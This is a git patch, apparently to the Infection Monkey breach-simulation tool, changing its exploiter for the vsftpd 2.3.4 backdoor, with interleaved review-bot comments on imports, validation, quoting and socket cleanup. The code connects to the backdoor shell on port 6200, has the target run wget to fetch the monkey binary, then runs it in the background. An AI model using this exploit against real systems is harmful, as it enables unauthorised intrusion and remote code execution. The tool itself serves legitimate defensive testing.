From bb8a1c5c017a7949148a661d9f6cef098aa3e0cb Mon Sep 17 00:00:00 2001 From: Dhayalan Date: Tue, 12 Mar 2019 19:38:48 +0100 Subject: [PATCH] Updated the exploit. The `.` was removed from reportpage.js and the exploit was modified. --- monkey/infection_monkey/exploit/vsftpd.py | 44 ++++++++----------- .../cc/ui/src/components/pages/ReportPage.js | 2 +- 2 files changed, 20 insertions(+), 26 deletions(-) diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index 5819d7d44..86e64953a 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -1,17 +1,15 @@ -import logging -from logging import getLogger - -import paramiko import StringIO -import socket +import logging +import paramiko +import socket import time - +from common.utils.exploit_enum import ExploitType from infection_monkey.exploit import HostExploiter +from infection_monkey.exploit.tools import build_monkey_commandline from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth from infection_monkey.model import MONKEY_ARG from infection_monkey.network.tools import check_tcp_port -from infection_monkey.exploit.tools import build_monkey_commandline -from common.utils.exploit_enum import ExploitType +from logging import getLogger LOG = getLogger(__name__) @@ -23,7 +21,6 @@ USERNAME = b'USER letmein:)\n' PASSWORD = b'PASS please\n' - class VSFTPDExploiter(HostExploiter): _TARGET_OS_TYPE = ['linux'] 
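Review bot: The reordered import block in the first hunk now mixes standard-library, third-party and project imports in one run, with `from logging import getLogger` placed last, after the `infection_monkey` imports. Grouping them as standard library (`StringIO`, `logging`, `socket`, `time`), then `paramiko`, then the project modules, with a blank line between groups, would follow PEP 8 and keep later import diffs small. `import logging` and `from logging import getLogger` are both kept although the visible code only calls `getLogger`; whether `logging` or `paramiko` are used further down cannot be seen from this hunk.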
@@ -53,16 +50,7 @@ class VSFTPDExploiter(HostExploiter): backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) backdoor_socket.connect((self.host.ip_addr, 6200)) LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr) - command = str.encode("uname -o" + '\n') - backdoor_socket.send(command) - response = backdoor_socket.recv(1024).decode('utf-8') - LOG.info('[+] Response for uname -o: %s', response) - if 'linux' in response.lower().strip(): - #command execution is successful - self.host.os['type'] = 'linux' - else : - LOG.info("Port 6200 opened but failed to execute commands on victim %r ",self.host) - + command = str.encode("uname -m" + '\n') backdoor_socket.send(command) response = backdoor_socket.recv(1024).decode('utf-8') @@ -70,10 +58,13 @@ class VSFTPDExploiter(HostExploiter): if '' != response.lower().strip(): #command execution is successful self.host.os['machine'] = response.lower().strip() + self.host.os['type'] = 'linux' + else : LOG.info("Failed to execute command uname -m on victim %r ",self.host) src_path = get_target_monkey(self.host) + LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", self.host) 
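Review bot: `self.host.os['type'] = 'linux'` is now set whenever the reply to `uname -m` is non-empty, and the `uname -o` check that used to back that label is removed, so whatever text arrives on the socket is stored as `os['machine']` and the host is labelled linux without the reply being checked. These fields feed `get_target_monkey(self.host)` a few lines later, so the reply should be compared with the expected architecture strings before it is recorded, for example `if machine in EXPECTED_MACHINES:`, where `EXPECTED_MACHINES` is a placeholder for the project's own list. The added `LOG.info("src for suitable monkey executable ...")` runs before the `if not src_path` check, so on the failure path it logs an empty value and is followed at once by the "Can't find suitable monkey executable" message; moving it below the check avoids the duplicate. The enclosing method starts and ends outside the hunk.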
@@ -83,16 +74,19 @@ class VSFTPDExploiter(HostExploiter): LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr) #copy the monkey into the machine - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) dropper_target_path_linux = self._config.dropper_target_path_linux + LOG.info("Download link for monkey is %s",http_path) #download the monkey download_command = '/usr/bin/wget %s -O %s;' % ( - http_path, dropper_target_path_linux) + http_path, dropper_target_path_linux) LOG.info("Download_command is %s",download_command) command = str.encode(str(download_command) + '\n') - backdoor_socket.send(command) + backdoor_socket.send(command) + time.sleep(3) # wait till the file is downloaded + LOG.info("waiting 3 seconds for download to be completed") #changeit to executable @@ -108,13 +102,13 @@ class VSFTPDExploiter(HostExploiter): cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) cmdline += "&" - - command = str.encode(str(cmdline) + '\n') + + command = str.encode(str(cmdline) + '\n') backdoor_socket.send(command) + LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, cmdline) - backdoor_socket.close() self._exploit_info['Vulnerability'] = {"Success":"True"} except Exception: diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js index 556fbd1a5..7dae3f2ed 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js @@ -302,7 +302,7 @@ class ReportPageComponent extends AuthComponent { className="label label-warning"> {this.state.report.overview.issues.filter(function (x) { return x === true; - }).length} threats.: + }).length} threats:
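Review bot: `download_command` is built by `%`-formatting `http_path` and `dropper_target_path_linux` directly into a shell line, so a configured path that contains a space or a shell metacharacter changes what the remote shell runs; quoting both values, e.g. `pipes.quote(dropper_target_path_linux)` with `import pipes` added at the top of the file, keeps the command to what was intended. The new `LOG.info("waiting 3 seconds for download to be completed")` is emitted after `time.sleep(3)` has already returned, so it should move above the sleep or be reworded in the past tense. `http_thread` returned by `create_locked_transfer` is not stopped or joined anywhere in this hunk; if that does not happen later in the method, the transfer server outlives the exploiter. The method continues outside the hunk.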
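Review bot: In the `@@ -108,13 +102,13 @@` hunk, `self._exploit_info['Vulnerability'] = {"Success":"True"}` and the "Executed monkey" log line are reached as soon as `backdoor_socket.send(command)` returns, which shows only that the bytes were handed to the socket, so the report can state a success that was never observed. I would at least document this above the assignment with `# "Success" means the command was sent; execution on the host is not confirmed`, and store the boolean `True` instead of the string `"True"` if the report consumers allow it. Nothing visible in the hunk closes `backdoor_socket` when an earlier `send` or `recv` raises into `except Exception:`; wrapping the socket use in `try: ... finally: backdoor_socket.close()` would cover that path. The `try` statement and the body of the `except` lie outside the hunk.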